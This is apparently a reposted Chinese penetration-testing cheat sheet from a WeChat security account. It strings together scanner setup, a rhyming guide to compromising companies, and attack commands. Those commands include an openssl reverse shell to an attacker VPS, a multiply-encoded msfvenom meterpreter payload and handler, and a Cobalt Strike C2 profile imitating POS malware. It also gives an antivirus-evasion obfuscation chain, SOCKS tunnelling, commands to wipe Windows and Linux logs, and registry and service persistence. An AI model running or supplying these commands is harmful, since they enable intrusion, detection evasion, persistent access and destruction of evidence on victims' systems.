前言
测试导图以及小工具
·# 拉取镜像
docker pull leishianquan/awvs-nessus:v1
# 启动
docker run -it -d -p 13443:3443 -p 8834:8834 leishianquan/awvs-nessus:v1
# 查看容器
docker ps –a
# 启动容器
docker start container-id
# 进入容器
docker exec –it container-id /bin/bash
# 进入容器后,启动nessus
/etc/init.d/nessusd start
# 访问扫描器地址和账号密码
Nessus:
https://127.0.0.1:8834/#/
account:leishi/leishianquan
Awvs13:
https://127.0.0.1:13443/
account:admin@admin.com/Admin123
一.时刻关注返回的数据包
进谷歌 找注入
没注入 就旁注
没旁注 用0day
没0day 猜目录
没目录 就嗅探
爆账户 找后台
传小马 放大马
拿权限 挂页面
放暗链 清数据
渗透企业实战版
搞企业 先扫描
扫描器 商业好
默密码 都知道
社工库 找一找
邮箱号 先列好
九头蛇 跑一跑
搞不定 放大招
找插件 挖一挖
发邮件 凭伪造
没邮箱 搞网站
二级域 皆可爆
老漏洞 没修好
新漏洞 刷一票
干研发 Git 找
源代码 全都要
C D N 可以跳
防火墙 可以撬
堡垒机 可以秒
云防护 可以秒
是企业 没有哪家搞不了!
二.FUZZ的艺术
上生成 ssl 证书的公钥/私钥对:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
监听反弹 shell:
openssl s_server -quiet -key key.pem -cert cert.pem -port 80
shell:
mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <your_vps>:1024 > /tmp/s; rm /tmp/s
VPS 上已获取加密的 getshell 了。
1.将 tunnel脚本(aspx | ashx | jsp | php)上传到Web服务器,访问显示“Georg says, ‘All seems fine’“,表示脚本运行正常。
2.在攻击者机器上,启动reGeorgSocksProxy.py,监听9999端口,看到 Checking if Georg is ready,确认正常运行,这个时候就可以吧目标机作为跳板了。
四.提权与权限维持
###生成证书并写入文件
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout rsaprivate.key -out servercertificate.crt
cat rsaprivate.key servercertificate.crt >my.pem
###生成payload
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=39.97.167.211 LPORT=6667 --platform windows -a x86 HandLerSSLCert= ./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw| msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "x00x0ax0d" -f raw > /home/xskali/kali/Shecodject/output/shellcode.raw
###监听
msfconsole -q -x 'use exploit/multi/handler;set ExitOnSession false;set PAYLOAD windows/meterpreter/reverse_winhttps;set LHOST 192.168.129.128; set LPORT 4445; set HandlerSslCert /home/xskali/kali/Shecodject/output/my.pem;set StagerVerifySSLCert true; set SessionCommunicationTimeout 600 ;set autorunscript post/windows/manage/migrate; run -j -Z'
老牌工具Cobaltstrike+Profiles
keytool -genkey -alias tryblog -keyalg RSA -validity 36500 -keystore tryblog.store
2.C2.profile文件编辑
set sample_name "tryblog POS Malware";
set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";
#设置证书,注意以下内容得和你之前生成的证书一样
https-certificate {
set CN "TRY";
set O "TRY";
set C "TRY";
set L "TRY";
set OU "TRY";
set ST "TRY";
set validity "365";
}
#设置,修改成你的证书名称和证书密码
code-signer{
set keystore "tryblog.store";
set password "tryblog";
set alias "tryblog";
}
#指定DNS beacon不用的时候指定到IP地址
set dns_idle "8.8.4.4";
#每个单独DNS请求前强制睡眠时间
set dns_sleep "0";
#通过DNS上载数据时主机名的最大长度[0-255]
set maxdns "235";
http-post {
set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";
client {
header "Accept" "text/plain";
header "Accept-Language" "en-us";
header "Accept-Encoding" "text/plain";
header "Content-Type" "application/x-www-form-urltrytryd";
id {
netbios;
parameter "id";
}
output {
base64;
prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
print;
}
}
server {
output {
print;
}
}
}
http-get {
set uri "/updates";
client {
metadata {
netbiosu;
prepend "user=";
header "Cookie";
}
}
server {
header "Content-Type" "text/plain";
output {
base64;
print;
}
}
}
3.验证c2lint,启动服务端,载入汉化运行
C2.profile
ip:prot ./C2.profile
UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar =
免杀远控整理(来自Tide团队)
windows下的免杀生成(顺序从上到下依次混淆)
1.Lime-Crypter 注入线程
2.DeepSeaOBFuscator 封装
3.CryptoObfuscator 混淆
4.https 证书修改
5.base64prionx 混淆
6.themida 加壳
7.https 证书修改
8.viper(在线msf处理平台可加特征和签名很方便)
Exploit批量扫描:Windows-Exploit-Suggester
漏洞模块:https://github.com/SecWiki/windows-kernel-exploits
BITS免杀提权:https://github.com/ohpe/juicy-potato
linux
搜寻配置文件中的明文密码、sudo滥用
Exploit批量扫描:linux-exploit-suggester、linux-exploit-suggester-2
漏洞模块:https://github.com/SecWiki/linux-kernel-exploits
五、日志清理(细心的安全工程师会更改位置并定时备份后渗透主要还是靠细心)
遇见不能删除的先停止相关服务:net stop “task scheduler”
系统日志推荐使用工具:clearlog.exe
msf清理:clearev ,run event_manager -c
防火墙日志路径:%systemroot%system32logfiles
IIS日志路径:%systemroot%system32logfles
windows系统日志:%systemroot%system32config
Scheduler服务日志:%systemroot%schedlgu.txt
日志在注册表的键:HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog
系统日志:%SystemRoot%System32WinevtLogsSystem.evtx
安全日志:%SystemRoot%System32WinevtLogsSecurity.evtx
应用程序日志:%SystemRoot%System32WinevtLogsApplication.evtx
history -c
echo “”> /root/.bash_history
echo “”> /var/run/utmp
2.清除部分日志:echo “”> /var/log/secure;全删除如不能删除使用echo依次覆盖:rm -f -r /var/log/*;
/var/log/boot.log:录了系统在引导过程中发生的事件,就是Linux系统开机自检过程显示的信息
/var/log/lastlog :记录最后一次用户成功登陆的时间、登陆IP等信息
/var/log/messages :记录Linux操作系统常见的系统和服务错误信息
/var/log/secure :Linux系统安全日志,记录用户和工作组变坏情况、用户登陆认证情况
/var/log/btmp :记录Linux登陆失败的用户、时间以及远程IP地址
/var/log/syslog:只记录警告信息,常常是系统出问题的信息,使用lastlog查看
/var/log/wtmp:该日志文件永久记录每个用户登录、注销及系统的启动、停机的事件,使用last命令查看
/var/log/maillog 与邮件相关的日志信息
/var/log/cron 与定时任务相关的日志信息
/var/log/spooler 与UUCP和news设备相关的日志信息
/var/log/auth.log 系统授权信息,包括用户登录和使用的权限机制等 (debian)
/var/run/utmp:该日志文件记录有关当前登录的每个用户的信息。如 who、w、users、finger等就需要访问这个文件
apche:C:Program FilesApache Software FoundationApache2.2htdocs"
tomact:CProgram Filestomcatlog
nignx: CProgram Filesnginx-1.14.2logs
linux
tomcat:/usr/local/tomcat/logs/
apche:/usr/local/apache/logs/access_log
nignx:/var/log/httpd/error_log rm -f -r /var/log/*
./frsocks -sockstype fsocks -listen 2333 //创建本地监听
./protoplex --socks5 192.168.154.130:2333 --http 127.0.0.1:80 -b 192.168.154.130:9999 //端口分流,根据协议类型转到本地的2333和80端口
sudo iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 9999
windows:
netsh interface portproxy add v4tov4 listenport=80 listen address=192.168.154.129 connectport=9999 connectaddress=192.168.154.129
netsh interface portproxy show all //查看转发规则
netsh interface portproxy reset //清除所有转发规则
后渗透
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "Keyname" /t REG_SZ /d "C:UsersKingXL1.exe" /f
reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v "test" /t REG_SZ /d "C:UsersKingXL1.exe" /f
sc create "server power" binpath= "C:WindowsSystem32config.exe"
//设置服务的描述字符串
sc description "server power" "description"
//设置这个服务为自动启动
sc config "server power" start= auto
net start "server power" 启动服务
八、 一个便捷的HACK浏览器(上火狐开发者版本也不错)
Ajax Interceptor:可以自定义ajax的json返回值,前端测试用。
红队用,可以检查网页中的蜜罐链接并提示。
Ajax Capture Debugging Tool:这个是神器!!强推,可以测试网页中任何的ajax请求包括跨站ajax请求重放,官网提供了只30天的请求历史记录记得保存重要请求。
可以拦截一些cdn和本地的文件跟踪器
APK Downloader for Google Play Store :免google框架在线下载应用商店的app。
Buster Captcha Solver for Humans:过goole验证码,有时候识别会比较慢。
Easy WebRTC Block:干掉webrtc的ip回显,避免泄露真实ip
IP Whois & Flags Chrome & Websites Rating:自动在后台测试当前网站ip的归属地然后以小图标的形式返回给前台非常便捷,点击进去还可以看到cdn以及whois信息。
NoScript: 慎用,此插件可以强力的拦截网页上的追踪器来保护用户的隐私与真实信息,但是会造成许多网站打开异常。
Identify web technologies :可以帮你分析当前网站所使用的网络技术与框架。
网络搜索引擎同fofa与钟馗之眼,互联网设备大杀器
Extension:画中画悬浮窗口看视频
可以再后台默默的扫描是否有源代码泄露
HackTools:方便懒人使用点击扩展可快速复制sql,xss,反弹shell。
本文转自:https://xlmy.net/
排版自:白帽子左一
推荐阅读
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看”
原文始发于微信公众号(橘猫学安全):针对渗透技巧的一些汇总避坑笔记
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论